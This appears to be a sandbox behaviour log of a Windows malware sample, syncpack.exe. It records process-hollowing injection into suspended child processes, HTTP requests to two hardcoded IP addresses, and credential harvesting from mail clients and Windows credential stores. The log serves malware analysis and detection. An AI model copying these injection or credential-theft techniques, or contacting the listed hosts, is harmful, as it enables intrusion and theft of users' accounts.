File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", os_pid = 0x8a0, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, size = 102400 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Copy source_filename = C:\Windows\system32\alg.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", os_pid = 0x834, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x40000000, protection_out = PAGE_READWRITE, PAGE_EXECUTE_READWRITE, size_out = 0 True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x2d7f898, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 47708320 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x140000000, size = 126976 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, type = size True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp True 1
Fn
Thread 0x868
25 0
»
Category Operation Information Success Count Logfile
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", os_pid = 0x728, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 False 1
Fn
Module Unmap process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, size = 372736 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, type = size True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp True 1
Fn
Thread 0x864
48 7
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250834 True 1
Fn
System Get Time type = System Time, time = 2018-06-25 14:54:22 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fc359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7604410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760446b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76056676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760447e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760447f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75fdeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Mutex Create mutex_name = Global\Nx357ECDE7 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = ws2_32.dll, base_address = 0x75af0000 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = 94.70.244.227, server_port = 80 False 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://94.70.244.227:80/whoami.php False 1
Fn
Inet Open Connection protocol = http, server_name = 190.213.248.219, server_port = 80 False 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS False 1
Fn
Thread 0x860
10 0
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250865 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = mpr.dll, base_address = 0x750f0000 True 1
Fn
Module Load module_name = netapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Load module_name = SAMCLI.DLL, base_address = 0x74de0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Process #8: syncpack.exe
182 0
»
Information Value
ID #8
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x4f4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 480
0x 12C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001c40000 0x01c40000 0x01d3ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01d40000 0x0200efff Memory Mapped File Readable False False False -
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x878 os_tid = 0x480, address = 0x0 True 1
Fn
Threads
Thread 0x480
182 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x766cfb26 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini, type = file_attributes False 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Profiles, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\Profiles, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x6fe60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76295a7f True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x77787941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x77787381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Identities False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Fn
